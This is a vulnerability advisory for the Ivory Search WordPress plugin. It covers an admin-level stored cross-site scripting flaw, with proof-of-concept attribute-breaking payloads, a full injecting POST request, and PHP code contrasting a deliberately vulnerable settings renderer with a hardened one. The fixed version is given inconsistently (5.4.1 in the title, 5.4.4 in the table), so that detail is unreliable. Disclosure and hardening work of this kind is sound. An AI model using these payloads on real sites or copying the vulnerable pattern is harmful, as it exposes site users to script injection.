wpvulndb
WPVDB-ID: A9AB9E84-7F5E-4E7C-8647-114D9E02E59F
Author: Yoru Oni
History: Jan 10, 2022 - 12:00 a.m.

Ivory Search < 5.4.1 - Multiple Admin+ Stored Cross-Site Scripting

Source: wpscan.com

EPSS: 0.001 (Low), Percentile: 24.8%

The plugin does not escape some of the Form settings before printing them back into the settings page, which allows high-privilege (Admin+) users to store Cross-Site Scripting payloads that execute whenever the form's settings are rendered. Because the values are output raw by the plugin itself, this works even when the unfiltered_html capability is disallowed (for example on multisite, or when DISALLOW_UNFILTERED_HTML is set), where WordPress would otherwise strip such markup from post content.

PoC

Go to the AJAX settings of a Form and put the following payload in the "Minimum number of characters required to run ajax search." (min_no_for_search field) or "Text when there is no search results" (nothing_found_text field) settings:

"style=animation-name:rotation onanimationstart=alert(/XSS/)// yo="

Note: The min_no_for_search field is only validated to be a number client side.

For the _is_settings[highlight_color] parameter, a payload such as " autofocus=autofocus onfocus=alert(/XSS/)// oni=" can be used:

POST /wp-admin/admin.php?page=ivory-search&post=14&tab=options HTTP/2
Cookie: [admin cookies]
Content-Type: application/x-www-form-urlencoded

_wpnonce=e29855f021&post_ID=14&is_locale=&action=save&tab=options&_is_settings%5Bposts_per_page%5D=10&_is_settings%5Bhighlight_terms%5D=1&_is_settings%5Bhighlight_color%5D=%23FFFFB%22+autofocus%3Dautofocus+onfocus%3Dalert%28/XSS/%29%2F%2F+oni%3D%22&_is_settings%5Bterm_rel%5D=OR&_is_settings%5Bfuzzy_match%5D=2&_is_settings%5Bsearch_engine%5D=index&_is_settings%5Bmove_sticky_posts%5D=1&_is_settings%5Bdemo%5D=1&_is_settings%5Bdisable%5D=1&_is_settings%5Bempty_search%5D=1&is_save=Save+Form
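The following is an added illustration of the bug class, not Ivory Search's own code: a settings page that concatenates the three PoC values straight into input attributes, beside a hardened version that validates each field server side on save and escapes for the attribute context on output. The shims at the top are assumptions so the file runs on a plain php CLI; inside WordPress the real esc_attr(), absint() and sanitize_hex_color() are used instead and behave the same way on these inputs.

```php
<?php
// Added example (not the plugin's code): vulnerable vs hardened rendering of
// the _is_settings fields named in the PoC. Field names mirror the PoC;
// everything else is illustrative.

// Shims so this runs outside WordPress; WP core defines the real ones.
if (!function_exists('esc_attr')) {
    function esc_attr($text) {
        return htmlspecialchars((string) $text, ENT_QUOTES, 'UTF-8');
    }
}
if (!function_exists('absint')) {
    function absint($maybeint) {
        return abs((int) $maybeint);
    }
}
if (!function_exists('sanitize_hex_color')) {
    function sanitize_hex_color($color) {
        if ('' === $color) {
            return '';
        }
        // #RGB or #RRGGBB only; anything else yields null, as in WP core
        return preg_match('|^#([A-Fa-f0-9]{3}){1,2}$|', $color) ? $color : null;
    }
}

// Constructed POST body values: the same payloads as the PoC above.
$raw = [
    'min_no_for_search'  => '"style=animation-name:rotation onanimationstart=alert(/XSS/)// yo="',
    'nothing_found_text' => '"style=animation-name:rotation onanimationstart=alert(/XSS/)// yo="',
    'highlight_color'    => '#FFFFB" autofocus=autofocus onfocus=alert(/XSS/)// oni="',
];

// VULNERABLE pattern: the "must be a number" check lives only in the browser,
// and every stored value is concatenated raw into a double-quoted attribute,
// so a leading " closes value="" and the rest becomes new attributes.
function render_vulnerable(array $s): string {
    $html = '';
    foreach ($s as $key => $value) {
        $html .= '<input type="text" name="_is_settings[' . $key . ']" value="' . $value . '">' . "\n";
    }
    return $html;
}

// HARDENED step 1: validate per field type on save, server side.
function sanitize_settings(array $raw): array {
    return [
        // integer field: a non-numeric payload collapses to 0
        'min_no_for_search'  => absint($raw['min_no_for_search'] ?? 0),
        // free text: stored as-is, but only ever printed through esc_attr()
        'nothing_found_text' => (string) ($raw['nothing_found_text'] ?? ''),
        // colour: anything that is not #RGB / #RRGGBB is dropped (null -> '')
        'highlight_color'    => (string) sanitize_hex_color($raw['highlight_color'] ?? ''),
    ];
}

// HARDENED step 2: escape for the attribute context at output time, whatever
// was stored and whatever capabilities the user who saved it had. This is the
// step that makes the unfiltered_html capability irrelevant here.
function render_hardened(array $s): string {
    $html = '';
    foreach ($s as $key => $value) {
        $html .= '<input type="text" name="_is_settings[' . esc_attr($key) . ']"'
               . ' value="' . esc_attr($value) . '">' . "\n";
    }
    return $html;
}

echo "Vulnerable markup (attribute context broken out of):\n";
echo render_vulnerable($raw);
echo "\nHardened markup:\n";
echo render_hardened(sanitize_settings($raw));
```

Run it with `php example.php` and compare the two blocks: in the hardened output the min_no_for_search value is `0`, highlight_color is empty, and the nothing_found_text payload survives as text but its quotes are printed as `&quot;`, so no attribute boundary is crossed. The capability check that WordPress applies to post content (kses filtering for users without unfiltered_html) never runs on plugin option values, which is why sanitizing on save alone is not enough and the output escaping is the essential part of the fix.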

CPE
Name                  Operator  Version
add-search-to-menu    lt        5.4.4
